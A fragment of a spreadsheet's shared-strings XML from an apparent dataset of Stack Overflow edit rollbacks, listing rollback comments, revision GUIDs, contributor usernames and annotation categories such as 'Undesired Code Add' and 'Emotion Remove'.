    <t>Rollback to [D9D7A05E-E009-4810-BFEE-6A22D53ED591]</t>
  </si>
  <si>
    <t>39c4710b-d143-41f5-ad80-37ca13b48dfb</t>
  </si>
  <si>
    <t>Rollback to [23833BE5-2346-415B-8C29-B73495F622C3]</t>
  </si>
  <si>
    <t>8745d366-6b19-4399-b030-315103036b07</t>
  </si>
  <si>
    <t>Rollback to [482c8e15-fcda-46b4-be50-e7b6c63af2f8]</t>
  </si>
  <si>
    <t>8138b210-e897-4ac2-86e8-a83a4e99aae1</t>
  </si>
  <si>
    <t>Rollback to [690e6e35-f3df-4ac1-a26c-14150aa0c7a3] - Last edit is wrong. System.getProperties() is in fact also available in Java 8, Java 7, Java 1.5, Java 1.4...</t>
  </si>
  <si>
    <t>cfb6bb47-8ea7-4549-9bc2-10fc78d1d41f</t>
  </si>
  <si>
    <t>Rollback to [31ce5e5d-384f-4e12-a1bf-5f86ba048239] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>85bcf035-dd73-4457-8117-efe0b0a3a7e9</t>
  </si>
  <si>
    <t>Rollback to [6bd99e71-2f0c-4a15-8f72-72022486d590]</t>
  </si>
  <si>
    <t>4b809372-bb16-47ae-8093-03399a4f11c5</t>
  </si>
  <si>
    <t>Rollback to [8b36e4d5-84af-433c-bea1-c8301af5f95b]</t>
  </si>
  <si>
    <t>5db2e16c-f09b-4c28-ad14-36245ff10d53</t>
  </si>
  <si>
    <t>Rollback to [8d0681e3-d4df-4552-b493-0d9e01dd98ea]</t>
  </si>
  <si>
    <t>e8df579d-cf03-4da1-98d2-1e2463777eaf</t>
  </si>
  <si>
    <t>Rollback to [4cf2ea82-9eae-4546-b2e8-5798b8a3419a]</t>
  </si>
  <si>
    <t>384dc62a-e1f9-481d-b998-fea492957efe</t>
  </si>
  <si>
    <t>Rollback to [0a9e4c7b-3982-40d9-8c8d-f9c0b9319837]</t>
  </si>
  <si>
    <t>8685666b-cd9f-4a0a-9f7a-94ce7122d128</t>
  </si>
  <si>
    <t>Rollback to [e57ec4c0-d5d9-4955-970b-db01a4951536] - reverted to original poster because 1) OP was quoting code from Marco Russo and 2) code was not in fact "optimized"</t>
  </si>
  <si>
    <t>1b8c9e1a-58f2-46d7-b26d-34f384523f15</t>
  </si>
  <si>
    <t>Rollback to [c4e7c1bd-f742-463e-82f7-6657bf734c84]</t>
  </si>
  <si>
    <t>6a2c445e-bf07-4abe-9990-a086658c2d49</t>
  </si>
  <si>
    <t>Rollback to [15a2376f-f0fe-4d37-bc20-1df7fa6b3313]</t>
  </si>
  <si>
    <t>1a235d3e-5a48-44c8-b365-fffc7dc29cc8</t>
  </si>
  <si>
    <t>Rollback to [82a979bb-9838-45c4-b70d-b7b7487a5d5d]</t>
  </si>
  <si>
    <t>3cd77606-4554-473c-97e7-a2792812777f</t>
  </si>
  <si>
    <t>Rollback to [eb1b1db9-b97f-4ac7-a3f0-2c9debd98cb0]</t>
  </si>
  <si>
    <t>42ed8007-247c-4124-9cf6-3c4ff0fe3dd2</t>
  </si>
  <si>
    <t>Rollback to [babfb532-e1f1-47d6-85df-5c9ec1a7bf8d]</t>
  </si>
  <si>
    <t>33835a5f-ef82-4434-9ec3-e3e4f5e7f754</t>
  </si>
  <si>
    <t>Rollback to [566a2a35-8bed-4749-b9a1-cf2e1c015a18]</t>
  </si>
  <si>
    <t>8a562e08-d647-499f-82ef-a581ba4e0ed1</t>
  </si>
  <si>
    <t>Rollback to [5fadcb19-e63f-4f55-b447-471749945e6d] - Rollback changes by someone who unilaterally hates var</t>
  </si>
  <si>
    <t>0333b42c-841c-4c73-849c-96f3fba92cbc</t>
  </si>
  <si>
    <t>Rollback to [c749deaa-5333-4bd5-bcb9-06620da6e0ab]</t>
  </si>
  <si>
    <t>54a0567b-0f28-45d5-b8b0-5fd42d9a69c0</t>
  </si>
  <si>
    <t>Rollback to [5d914c2f-25e0-4bf2-aaba-1d2c9bafc2c4]</t>
  </si>
  <si>
    <t>0fd82cf3-c4d7-406d-bccb-7975a6666fa3</t>
  </si>
  <si>
    <t>Rollback to [15f263f3-65e3-4e48-bb53-6ed9fe772e9b]</t>
  </si>
  <si>
    <t>cf00b70f-1b3e-4126-a013-8f4c2c24a696</t>
  </si>
  <si>
    <t>Rollback to [80993e74-a5e6-47f8-a361-3f11679f44e6]</t>
  </si>
  <si>
    <t>8bf66e13-f7d0-4408-b410-6ab0c8629a3b</t>
  </si>
  <si>
    <t>Rollback to [2d6ea45e-0fbd-4007-bd53-20953d7242f5]</t>
  </si>
  <si>
    <t>31b10885-f5f3-470f-93df-fa84b3e25f8f</t>
  </si>
  <si>
    <t>Rollback to [c39198ee-edbc-4b8e-a696-e36d707e0983]</t>
  </si>
  <si>
    <t>08981382-6516-4525-add8-1b09691e2454</t>
  </si>
  <si>
    <t>Rollback to [9492c630-c74b-48a3-b576-f3d3f215667b]</t>
  </si>
  <si>
    <t>71d7582c-927d-4553-b8ff-3ff3d442c580</t>
  </si>
  <si>
    <t>Rollback to [cc690ac0-4d87-4ab3-8893-a802fa8f8190]</t>
  </si>
  <si>
    <t>9a354826-9e6c-44c5-a892-13176daa2d42</t>
  </si>
  <si>
    <t>Rollback to [cc2d9f17-d690-4168-8397-8c41b9397de1]</t>
  </si>
  <si>
    <t>aaec7572-5a7b-4b4b-b3fb-0617d90e8b08</t>
  </si>
  <si>
    <t>Rollback to [3742BB52-9A9F-4E33-A3C2-69CC6344F947]</t>
  </si>
  <si>
    <t>21b26b9e-8e3f-4f7f-b0c5-885dc6ff92a0</t>
  </si>
  <si>
    <t>Rollback to [D38F8454-5D31-4DDA-941C-F81E73EB3B0B]</t>
  </si>
  <si>
    <t>d3ae2e73-6a6c-4d2d-9038-e8d7651cb448</t>
  </si>
  <si>
    <t>Rollback to [5a0c9b45-94a8-405b-8cea-376b9bd10377]</t>
  </si>
  <si>
    <t>3c6d467c-da14-4770-a05e-78b952a584bd</t>
  </si>
  <si>
    <t>Rollback to [c8377048-31d7-47f7-bec1-ec4ddd8c7216]</t>
  </si>
  <si>
    <t>012a8fa5-5234-4897-9593-4888dd728cdb</t>
  </si>
  <si>
    <t>Rollback to [edd995f0-5d55-45be-8369-5d3393d441fa]</t>
  </si>
  <si>
    <t>3a11bde8-9393-4797-aefd-2f4c682d5b0a</t>
  </si>
  <si>
    <t>Rollback to [70870A74-748F-443D-B9B0-EE7F54837673]</t>
  </si>
  <si>
    <t>dd76a129-b9a1-48a2-9114-7f0eb37dd132</t>
  </si>
  <si>
    <t>Rollback to [908eac51-3405-49b0-86a7-e8fd608439b2]</t>
  </si>
  <si>
    <t>344200d9-5b10-4dd5-a962-3667ddb71fa5</t>
  </si>
  <si>
    <t>Rollback to [d9b68ad9-4014-4306-a3d4-7541008f41f7]</t>
  </si>
  <si>
    <t>ad0e2b2a-afae-45d0-bf04-6b641c956462</t>
  </si>
  <si>
    <t>Rollback to [ea35fddc-5238-45e7-854e-2cca0c155557]</t>
  </si>
  <si>
    <t>ea951088-7832-41a1-a2d1-4d42ae673234</t>
  </si>
  <si>
    <t>Rollback to [7d2247f3-1cf9-447e-a868-82b61e1ccf04]</t>
  </si>
  <si>
    <t>5ef74ad7-04d4-48d2-b116-ab676dd6e1e3</t>
  </si>
  <si>
    <t>Rollback to [8a232aca-0bba-4d6d-a0da-7c9e769465a2]</t>
  </si>
  <si>
    <t>8cb3045d-313a-4e6d-9c58-a5d856ff1e45</t>
  </si>
  <si>
    <t>Rollback to [3febaf66-ad95-4a6d-8778-c97c1a002b88]</t>
  </si>
  <si>
    <t>Revision</t>
  </si>
  <si>
    <t>Reason1</t>
  </si>
  <si>
    <t>Reason2</t>
  </si>
  <si>
    <t>Reason3</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>Ref Mod</t>
  </si>
  <si>
    <t>Undesired Text Addition</t>
  </si>
  <si>
    <t>Undesired Text Formatting</t>
  </si>
  <si>
    <t>Undesired Code Add</t>
  </si>
  <si>
    <t>Incorrect Code Change</t>
  </si>
  <si>
    <t>Undesired Code Format</t>
  </si>
  <si>
    <t>Undesired Text Remove</t>
  </si>
  <si>
    <t>Undesired Text Change</t>
  </si>
  <si>
    <t>Incorret Text Change</t>
  </si>
  <si>
    <t>Undesired Code Removal</t>
  </si>
  <si>
    <t>Part Accept</t>
  </si>
  <si>
    <t>Emotion Remove</t>
  </si>
  <si>
    <t>Status add/remove</t>
  </si>
  <si>
    <t>UD code change</t>
  </si>
  <si>
    <t>UD Code Add/Removal</t>
  </si>
  <si>
    <t>Signature add/remove</t>
  </si>
  <si>
    <t>Reason4</t>
  </si>
  <si>
    <t>Inc Code Change</t>
  </si>
  <si>
    <t>Gratitude Add/Remove</t>
  </si>
  <si>
    <t>Emotion Add</t>
  </si>
  <si>
    <t>9b3e7a6a-f8f1-4091-a866-8c5690cb7b08</t>
  </si>
  <si>
    <t>29a7ffa4-91ee-4f44-9bcb-3c73babc8013</t>
  </si>
  <si>
    <t>fef40876-231f-4dde-9ad9-d63eb0a9df4b</t>
  </si>
  <si>
    <t>cac8cc34-8031-46c4-b2ee-f081637e1422</t>
  </si>
  <si>
    <t>28972e0e-06dc-4c2f-baff-13750b1d64ab</t>
  </si>
  <si>
    <t>f6db6ccb-ba6d-4ef5-b327-ca8e9676c50d</t>
  </si>
  <si>
    <t>a4065806-da6d-4fac-b585-14d6aeab6a44</t>
  </si>
  <si>
    <t>f8ad4dfc-b759-422d-861b-63dd16506658</t>
  </si>
  <si>
    <t>6b935d03-6ad7-4667-b41a-417fdc9c7f1d</t>
  </si>
  <si>
    <t>f4d42b37-3cd6-40d1-aaf1-2d6d51b29636</t>
  </si>
  <si>
    <t>503f3037-a3cd-474e-a4a0-23631aeefccd</t>
  </si>
  <si>
    <t>434a1ced-c3c9-4f7d-a939-9495e5061782</t>
  </si>
  <si>
    <t>5e9e7eea-a7c7-492b-89d9-9ab1fae970af</t>
  </si>
  <si>
    <t>6ad64dd1-e145-4e4f-a812-ee6357c73715</t>
  </si>
  <si>
    <t>7664e260-c250-4a8b-b611-c66929372af5</t>
  </si>
  <si>
    <t>82b2d579-0f60-4e44-9e03-6297bab635a2</t>
  </si>
  <si>
    <t>5ec8069b-0516-4d09-b6b4-48a5ed5db893</t>
  </si>
  <si>
    <t>c10f64bc-ccd8-488d-bf46-9905d44219f3</t>
  </si>
  <si>
    <t>649f785c-8ede-4b21-ac7f-ab75b4faeb64</t>
  </si>
  <si>
    <t>1c525609-1335-4f05-a08b-5940268301ef</t>
  </si>
  <si>
    <t>664353c9-e2e0-431c-b261-b182f5e09aa9</t>
  </si>
  <si>
    <t>8e0e195f-1ff2-46b6-92d5-11f581fe37d5</t>
  </si>
  <si>
    <t>Rollback to [62545953-93A3-45C3-8D60-2F20C8E6303B]</t>
  </si>
  <si>
    <t>Rollback to [0FD29351-CFA4-4CAD-B3C9-65A5386A2157]</t>
  </si>
  <si>
    <t>Rollback to [3ff76a0b-5687-4763-941e-16d04bad5793]</t>
  </si>
  <si>
    <t>Rollback to [fdb20f6c-d2c0-42f0-bee1-2b535848e99d]</t>
  </si>
  <si>
    <t>Rollback to [5034df8d-1f99-44b0-9ccf-4d2b7d6dea66]</t>
  </si>
  <si>
    <t>Rollback to [01492444-14B9-4398-8CCF-DCC29696F500]</t>
  </si>
  <si>
    <t>Rollback to [bb49fc8f-428d-411e-94da-02126e22e3e5]</t>
  </si>
  <si>
    <t>Rollback to [12315d94-fc39-4660-bd2c-f8f587f4a6b5]</t>
  </si>
  <si>
    <t>Rollback to [f13194e1-e576-4329-a497-d46b85e46900]</t>
  </si>
  <si>
    <t>Rollback to [4192b927-ad97-4a5b-8a8e-9017a54c6daa]</t>
  </si>
  <si>
    <t>Rollback to [368001a9-547b-4afa-bc6b-6c5e54fb0ed8]</t>
  </si>
  <si>
    <t>Rollback to [a64b55a8-4e30-44db-81a7-9de16b0f2dd6]</t>
  </si>
  <si>
    <t>Rollback to [7B29C2B1-40D8-4F42-BD90-14F4EAD3545F]</t>
  </si>
  <si>
    <t>Rollback to [43d15b95-aeac-4c11-a700-6d42e8b12d5f]</t>
  </si>
  <si>
    <t>Rollback to [E5F645B1-7C26-4442-A6FF-A51E6CBC4BA9]</t>
  </si>
  <si>
    <t>Rollback to [EFD23D7F-37D2-4E25-BD8F-DFC786C6D065]</t>
  </si>
  <si>
    <t>Rollback to [6002a042-661f-44f6-9775-bd59a555e6fc]</t>
  </si>
  <si>
    <t>Rollback to [03663DB5-0144-4F50-A9B5-C038D906CA41]</t>
  </si>
  <si>
    <t>Rollback to [518d1b31-50e8-4b64-af0e-e81a86c1e23f]</t>
  </si>
  <si>
    <t>Rollback to [46e9c61a-ddd8-4eaf-9e8d-926b2ef939f2]</t>
  </si>
  <si>
    <t>Rollback to [f9efc0d8-21e8-40fc-91c4-45c72b404a48]</t>
  </si>
  <si>
    <t>Rollback to [e897e00c-2d25-4ff6-95b6-e5d45a87e211]</t>
  </si>
  <si>
    <t>c5a6a7c1-bade-41ca-8006-d375607f609f</t>
  </si>
  <si>
    <t>Rollback to [b52e1a42-752f-404a-8347-65340743a1a5]</t>
  </si>
  <si>
    <t>b94235b2-8086-4434-9ffc-edaef5548af6</t>
  </si>
  <si>
    <t>Rollback to [73675237-d3cc-4935-851f-51dad3898dc8]</t>
  </si>
  <si>
    <t>c76a092d-6ad6-4464-950f-c7692c503063</t>
  </si>
  <si>
    <t>Rollback to [391688da-767b-4c12-9e74-91538c208a18]</t>
  </si>
  <si>
    <t>45d2cef1-906e-4bf1-aa80-779040b12c04</t>
  </si>
  <si>
    <t>Rollback to [4bbc4663-5a9d-4b53-b3ff-0c493b49e577]</t>
  </si>
  <si>
    <t>cdeb62aa-7a16-4916-b4b1-050d326befee</t>
  </si>
  <si>
    <t>Rollback to [56f5e8ab-cae4-4f3f-9359-2a919689a03f]</t>
  </si>
  <si>
    <t>f8377e17-d244-44e6-ad7e-06d2517f280a</t>
  </si>
  <si>
    <t>Rollback to [e3ea7572-41c0-4361-b665-b1747480c85a]</t>
  </si>
  <si>
    <t>705d353c-7ea0-4e6f-9c4b-1be92fcefa16</t>
  </si>
  <si>
    <t>Rollback to [1C3724E2-A3BE-4FFE-930C-4415D5218D14]</t>
  </si>
  <si>
    <t>9ada7e22-1273-4f75-973a-52ed0ae8222f</t>
  </si>
  <si>
    <t>Rollback to [14CE68F8-7911-4C26-8AC8-1C82EDB00991]</t>
  </si>
  <si>
    <t>edf1e8ff-8011-4165-8412-a78b901cbc4e</t>
  </si>
  <si>
    <t>Rollback to [0689922d-64bd-49d9-8e58-c486a34f3a79]</t>
  </si>
  <si>
    <t>9f03452a-afe0-46c8-85ae-a2d99698ede7</t>
  </si>
  <si>
    <t>Rollback to [2f06f9b7-daeb-49a4-84cf-03109c3ebc05]</t>
  </si>
  <si>
    <t>6698a85b-73fc-4713-ace7-63231caf9f21</t>
  </si>
  <si>
    <t>Rollback to [5FEA38D6-95E3-455F-96D7-56E0D48E476C]</t>
  </si>
  <si>
    <t>6129b28e-1b65-47ca-9308-61f8858510b3</t>
  </si>
  <si>
    <t>Rollback to [547e8b16-ef2d-4ae3-9ff4-292a8f55637e]</t>
  </si>
  <si>
    <t>3cc9501b-3b11-42d1-a664-b6caccd470a4</t>
  </si>
  <si>
    <t>Rollback to [eb212152-0956-4c17-968d-c88cd6151b36]</t>
  </si>
  <si>
    <t>499f2658-3bb4-492d-9135-dc9e9c7661d1</t>
  </si>
  <si>
    <t>Rollback to [ec4b263f-1973-4735-87e4-c017f747df9e]</t>
  </si>
  <si>
    <t>be037074-2d20-4728-ae75-3f277e708810</t>
  </si>
  <si>
    <t>Rollback to [EC7450F2-DD7D-49AC-A302-85FD3A7EF30B]</t>
  </si>
  <si>
    <t>Tomalak</t>
  </si>
  <si>
    <t>Gareth</t>
  </si>
  <si>
    <t>Martijn Pieters</t>
  </si>
  <si>
    <t>Bill the Lizard</t>
  </si>
  <si>
    <t>Jimmy</t>
  </si>
  <si>
    <t>Charlie Martin</t>
  </si>
  <si>
    <t>Robert Gamble</t>
  </si>
  <si>
    <t>Scott Wisniewski</t>
  </si>
  <si>
    <t>Samuel Liew</t>
  </si>
  <si>
    <t>TheHippo</t>
  </si>
  <si>
    <t>Fionnuala</t>
  </si>
  <si>
    <t>user207421</t>
  </si>
  <si>
    <t>jeffm</t>
  </si>
  <si>
    <t>Andreas Grech</t>
  </si>
  <si>
    <t>NobodyNada</t>
  </si>
  <si>
    <t>Sorskoot</t>
  </si>
  <si>
    <t>Nathan Griffiths</t>
  </si>
  <si>
    <t>Cerbrus</t>
  </si>
  <si>
    <t>Brad Larson</t>
  </si>
  <si>
    <t>Cyber Oliveira</t>
  </si>
  <si>
    <t>Jacco</t>
  </si>
  <si>
    <t>Kev</t>
  </si>
  <si>
    <t>Joel Coehoorn</t>
  </si>
  <si>
    <t>Wai Ha Lee</t>
  </si>
  <si>
    <t>Matt Curtis</t>
  </si>
  <si>
    <t>mattiast</t>
  </si>
  <si>
    <t>Marcus Adams</t>
  </si>
  <si>
    <t>Macho Matt</t>
  </si>
  <si>
    <t>ajh1138</t>
  </si>
  <si>
    <t>Triptych</t>
  </si>
  <si>
    <t>frankodwyer</t>
  </si>
  <si>
    <t>RollbackTo</t>
  </si>
  <si>
    <t>Rollback to [80298b7b-4971-41cf-a553-f95ad591db96]</t>
  </si>
  <si>
    <t>Deprecation Note</t>
  </si>
  <si>
    <t>145e2bd7-eefa-4bc9-ba67-ea9b60269ea4</t>
  </si>
  <si>
    <t>Rollback to [08836eb9-27de-48b7-b9e0-e3f44dddbad1]</t>
  </si>
  <si>
    <t>6d3deeb0-3ffc-4b30-bc96-f3afc107ad15</t>
  </si>
  <si>
    <t>Rollback to [e5f0d953-fca5-4703-8e28-9e696c7efc59]</t>
  </si>
  <si>
    <t>4c4fb97d-cfb3-415a-adb7-08fe8f5bc3d0</t>
  </si>
  <si>
    <t>Rollback to [059ce1c8-afc3-4953-9326-cd7f1613f203]</t>
  </si>
  <si>
    <t>3a970952-da9e-4741-a769-1b24022106e6</t>
  </si>
  <si>
    <t>Rollback to [aaff7bc0-0bfd-425b-9c7f-6da90bd48741]</t>
  </si>
  <si>
    <t>a4e3e96f-70d4-4ee8-a00b-5a9df8246e4b</t>
  </si>
  <si>
    <t>Rollback to [d357e5b6-4ba5-4309-b3f5-54139642a20e]</t>
  </si>
  <si>
    <t>a93ff95b-9f69-4714-9596-6190e9649ed0</t>
  </si>
  <si>
    <t>Rollback to [96745ba0-dd25-4e96-9a28-f53a17fc658c]</t>
  </si>
  <si>
    <t>26cb209a-c329-43b8-a247-2ca816111272</t>
  </si>
  <si>
    <t>Rollback to [3435871e-ed5f-481d-b685-7ba7407c1098]</t>
  </si>
  <si>
    <t>d4d10c0b-17c4-4cd9-9172-bfa037e64732</t>
  </si>
  <si>
    <t>Rollback to [3acf083f-0f80-44b8-8c4c-44be86810629]</t>
  </si>
  <si>
    <t>780df9d0-ba37-4d00-9f0e-ea6c215f6a91</t>
  </si>
  <si>
    <t>Rollback to [f98ee1cb-d419-47c1-ad6d-4169eb2c06f1]</t>
  </si>
  <si>
    <t>aa56f938-a0e0-4ff8-b43f-9694dc00ca89</t>
  </si>
  <si>
    <t>Rollback to [27cc0d9d-5e14-419c-b025-0af42194e528]</t>
  </si>
  <si>
    <t>753697f7-6164-46b0-a3e3-49c6e0d24afa</t>
  </si>
  <si>
    <t>Rollback to [E9DF701D-2BDE-4752-87BE-355B8E3ABF5D]</t>
  </si>
  <si>
    <t>2d82bc6c-7aab-4f73-9428-1a8a388c5f44</t>
  </si>
  <si>
    <t>Rollback to [1ad0e07b-3590-40bb-9916-50bc8dbe3cd7]</t>
  </si>
  <si>
    <t>54ed2fba-ec88-4ba6-9ce0-6d714d90fddd</t>
  </si>
  <si>
    <t>Rollback to [d2b32b4e-d825-4966-81a8-23ab4175a699]</t>
  </si>
  <si>
    <t>6738879f-facd-4c9b-9e70-09a84d525006</t>
  </si>
  <si>
    <t>Rollback to [e1fa397a-dca6-45e9-8b72-0c8249ef5c08]</t>
  </si>
  <si>
    <t>9c2c58f0-febb-485c-9d1b-3f13f8487be0</t>
  </si>
  <si>
    <t>Rollback to [3f269989-a5a4-4a33-8c2d-43c5bec95095]</t>
  </si>
  <si>
    <t>fa7c3839-5d18-4947-a37a-44d2c722e43c</t>
  </si>
  <si>
    <t>Rollback to [7df58ede-1ab1-4a07-b38f-b66afb3d0b8e]</t>
  </si>
  <si>
    <t>29dd54f5-6504-4664-9be7-ecce2ef497a5</t>
  </si>
  <si>
    <t>Rollback to [d6a1b4c0-b860-4096-97c2-7bf6c49b6010]</t>
  </si>
  <si>
    <t>cc54fb2c-f8fd-4ff8-8a79-a19520ba01cc</t>
  </si>
  <si>
    <t>Rollback to [120C4299-108A-4E82-8D6F-209877AED077]</t>
  </si>
  <si>
    <t>0d27c583-5249-4d03-8d85-1896810e2483</t>
  </si>
  <si>
    <t>Rollback to [2523e6e2-bb6f-4f22-a96b-5bfcd98ece37]</t>
  </si>
  <si>
    <t>d85eb053-f3c7-40b8-a4db-a78dc4c2af1c</t>
  </si>
  <si>
    <t>Rollback to [3176004d-1aac-4f92-8817-f95c6c78bf79]</t>
  </si>
  <si>
    <t>47dfcf60-57e0-48da-a418-63f0570c736b</t>
  </si>
  <si>
    <t>Rollback to [4f84f0bf-678e-4ee1-beb2-05101ca7bcbe]</t>
  </si>
  <si>
    <t>6990412a-f32c-4aa3-9e95-e732246d8d59</t>
  </si>
  <si>
    <t>Rollback to [8c28461f-f396-49b6-a849-3bca8d1d9666]</t>
  </si>
  <si>
    <t>6128a2d8-d517-4f20-942c-dd1358b49ad7</t>
  </si>
  <si>
    <t>Rollback to [b6c87e35-3c66-43ac-8c2f-4af446239a13]</t>
  </si>
  <si>
    <t>ebba3867-16c2-4f74-a31b-4bfacc0e17e7</t>
  </si>
  <si>
    <t>Rollback to [d26a5e5e-69b9-4323-9c0e-3b45135ef9e0]</t>
  </si>
  <si>
    <t>2b1da7cc-9a19-4478-89f7-729b8ac07826</t>
  </si>
  <si>
    <t>Rollback to [ec1fcadd-ef0b-4a3c-be92-f1bf01299a80]</t>
  </si>
  <si>
    <t>7d5e95c6-df97-44b1-a6ae-3a00df3099b2</t>
  </si>
  <si>
    <t>Rollback to [d59965d9-fbdf-408d-a95d-b90faecd7c65]</t>
  </si>
  <si>
    <t>11e27253-9891-4b2a-99e7-2984281b8511</t>
  </si>
  <si>
    <t>Rollback to [aba2a859-06ba-42d7-822e-1f6afa6160dc]</t>
  </si>
  <si>
    <t>4a4922fb-8a15-4467-b839-5d890793b89c</t>
  </si>
  <si>
    <t>Rollback to [6709b36c-2baf-4e40-aff0-441f2d82b672]</t>
  </si>
  <si>
    <t>6e15240b-2051-49bb-b3f4-466d78da8869</t>
  </si>
  <si>
    <t>Rollback to [AAB5D932-A806-4EE6-B047-A0B23114ADBD]</t>
  </si>
  <si>
    <t>1d0215e2-6fcc-4cf3-a132-161c2b1daaa5</t>
  </si>
  <si>
    <t>Rollback to [3199315c-88c2-47f6-b1fb-806a0a06015f]</t>
  </si>
  <si>
    <t>3488f7b2-9c15-4b6e-99eb-732c4ccecd87</t>
  </si>
  <si>
    <t>Rollback to [3f1bd67d-488e-45e3-aab3-0fef16efbbc9]</t>
  </si>
  <si>
    <t>4fc5bcbc-0611-4b63-b9f8-754267219cce</t>
  </si>
  <si>
    <t>Rollback to [6860bd2a-697f-4445-90e2-405fdeb9590e]</t>
  </si>
  <si>
    <t>b437bab9-08c4-4185-bb06-db43cfb56c90</t>
  </si>
  <si>
    <t>Rollback to [d823ef72-1fd1-4727-8ae8-cab9e1380383]</t>
  </si>
  <si>
    <t>b76552a0-3487-42cd-8aa5-0ee2ce71c28b</t>
  </si>
  <si>
    <t>Rollback to [fd6f83e4-f883-4591-8a16-a380efcc5d35]</t>
  </si>
  <si>
    <t>57b16a81-ad6f-4575-92da-44445fa2b401</t>
  </si>
  <si>
    <t>Rollback to [596a9bef-4807-4cbe-8cdb-eaab260ac719]</t>
  </si>
  <si>
    <t>928976be-b081-4bcc-8c43-b9ff6e8d77e4</t>
  </si>
  <si>
    <t>Rollback to [CA3B77C2-169A-4893-9D46-2B014D79C560]</t>
  </si>
  <si>
    <t>02a474ab-cd88-4107-a5bb-af28c1ece62c</t>
  </si>
  <si>
    <t>Rollback to [28184278-2149-4C92-B795-D3BF3DD081C9]</t>
  </si>
  <si>
    <t>87b0ad4c-2b73-4208-9189-90513d94a97a</t>
  </si>
  <si>
    <t>Rollback to [59dea40e-f557-4a1c-8e37-8871cc86755a]</t>
  </si>
  <si>
    <t>8bb3027f-8921-4153-93d4-a4805a483c95</t>
  </si>
  <si>
    <t>Rollback to [bc2f74ca-6f4a-483f-9f5f-700fe221cfa2]</t>
  </si>
  <si>
    <t>368b1bb8-458c-46f6-be53-7104bce0a98a</t>
  </si>
  <si>
    <t>Rollback to [b135c731-5256-4eef-9809-b0ef6f36fa24]</t>
  </si>
  <si>
    <t>fdaa4c92-de51-4bde-a52f-f6435e77932b</t>
  </si>
  <si>
    <t>Rollback to [a31ccf6b-a94d-472f-bdae-7d5d4e14d417]</t>
  </si>
  <si>
    <t>080f2b6e-32a6-4733-959f-fe2958a89b11</t>
  </si>
  <si>
    <t>Rollback to [ed38a90f-4ec7-408b-86ba-7ffcfd16e3f7]</t>
  </si>
  <si>
    <t>a101b1af-b382-41ad-9ded-26aa86b0d7d0</t>
  </si>
  <si>
    <t>Rollback to [d0264e2a-9d14-4bed-b752-282e6e473ee1]</t>
  </si>
  <si>
    <t>43541176-4f91-427a-94d2-63bda760e780</t>
  </si>
  <si>
    <t>Rollback to [F1F1D627-2353-4E01-974A-014F62686671]</t>
  </si>
  <si>
    <t>a4d296c0-4d90-425c-891a-1e7251974f34</t>
  </si>
  <si>
    <t>Rollback to [521560FE-E012-4C2B-9837-D4625339D075]</t>
  </si>
  <si>
    <t>b3cff000-bd07-4167-9e80-24b21c1f3d2c</t>
  </si>
  <si>
    <t>Rollback to [7BD35D5E-AA6E-4685-ABCD-7CD57DD58C0A]</t>
  </si>
  <si>
    <t>ba6e6e6d-f699-4754-bbd0-a2a87f907438</t>
  </si>
  <si>
    <t>Rollback to [f272a7e6-b7e7-4564-abe4-92dc00bf0388]</t>
  </si>
  <si>
    <t>f459dfff-3825-4b7e-bb46-9fae3b151d20</t>
  </si>
  <si>
    <t>Rollback to [F86187A7-BD1B-418A-B7A3-817A9DEBFDFE]</t>
  </si>
  <si>
    <t>819aed56-23d5-4019-b64d-39603a32ca4d</t>
  </si>
  <si>
    <t>Rollback to [fdf916e2-a25b-466a-adf8-6a3f3a73303e]</t>
  </si>
  <si>
    <t>bf915056-dbe9-410c-906e-b1fabba90847</t>
  </si>
  <si>
    <t>Rollback to [ee49ed98-912e-457f-9b69-9a3755717284] - Rollback awful &amp; pointless edit</t>
  </si>
  <si>
    <t>b0ae83ea-e6b1-4f45-bdf0-aa25d803c089</t>
  </si>
  <si>
    <t>Rollback to [58B7F9AF-4A9F-449D-B7DA-C3D8B7AE7DB7]</t>
  </si>
  <si>
    <t>a3e1fec9-a29c-41d3-ae3a-8515cb6977be</t>
  </si>
  <si>
    <t>Rollback to [B5DDFEE3-7A77-4445-A160-0A52039B9E6D]</t>
  </si>
  <si>
    <t>45cac9ae-9274-41de-9093-034fba2e7262</t>
  </si>
  <si>
    <t>Rollback to [c4a13edf-5b71-47f7-a93a-7f18105ec17b]</t>
  </si>
  <si>
    <t>e71dd7ce-d838-4308-a51c-d63f0ec30a58</t>
  </si>
  <si>
    <t>Rollback to [B3DF467D-CED3-49C4-B7D1-39CC91B46C1E]</t>
  </si>
  <si>
    <t>5917bdfc-1aa4-4ed7-b4c4-fc65e3f0afb0</t>
  </si>
  <si>
    <t>Rollback to [95594445-EA60-4FDC-B226-7F340B71B2AB]</t>
  </si>
  <si>
    <t>497763d9-e4b2-4087-9c49-5baba15a37a9</t>
  </si>
  <si>
    <t>Rollback to [921d523c-9662-4ff0-a5e8-e8d907628918]</t>
  </si>
  <si>
    <t>955bd0c7-c621-4a41-8b91-025266acd27d</t>
  </si>
  <si>
    <t>Rollback to [814f0481-42a7-48f8-bed0-aba7fc476c65] - Restored author's original intent. It's obvious from the question and the existing answers that what's wanted is "M", not "MM".</t>
  </si>
  <si>
    <t>8d38ffbd-341d-47df-bf35-ea642276b43a</t>
  </si>
  <si>
    <t>Rollback to [37592594-5a65-4727-a4e0-3bf62fd3fd6b]</t>
  </si>
  <si>
    <t>01df2e3a-2d3b-42db-80d7-ab0e8e5727c8</t>
  </si>
  <si>
    <t>Rollback to [B21452F4-ED18-44B0-81B2-EC9D9E2D5456]</t>
  </si>
  <si>
    <t>02604132-5712-4c4b-a17a-7a461604a337</t>
  </si>
  <si>
    <t>Rollback to [595D7632-E95D-466D-98A3-573919F85869]</t>
  </si>
  <si>
    <t>12f2295a-4114-41e6-8c9e-8acd7dd5e921</t>
  </si>
  <si>
    <t>Rollback to [4d43a34b-1a45-419d-b673-7053e1872270]</t>
  </si>
  <si>
    <t>33d5222a-5d36-43c9-a217-b5f0003312e4</t>
  </si>
  <si>
    <t>Rollback to [78b801ab-12c7-42e6-8cb9-15d78216b982]</t>
  </si>
  <si>
    <t>8d769684-cb04-4b6b-b56f-c04d85643330</t>
  </si>
  <si>
    <t>Rollback to [697c0a27-e1a0-4d88-8970-b7d1360c70e0]</t>
  </si>
  <si>
    <t>33915bd9-f91e-49d4-a1c7-d87cbe13e157</t>
  </si>
  <si>
    <t>Rollback to [8e3775d3-b56a-4510-8308-801c8055b1ed]</t>
  </si>
  <si>
    <t>2860ac9a-4f36-4c10-bad7-8efbd4e94fd8</t>
  </si>
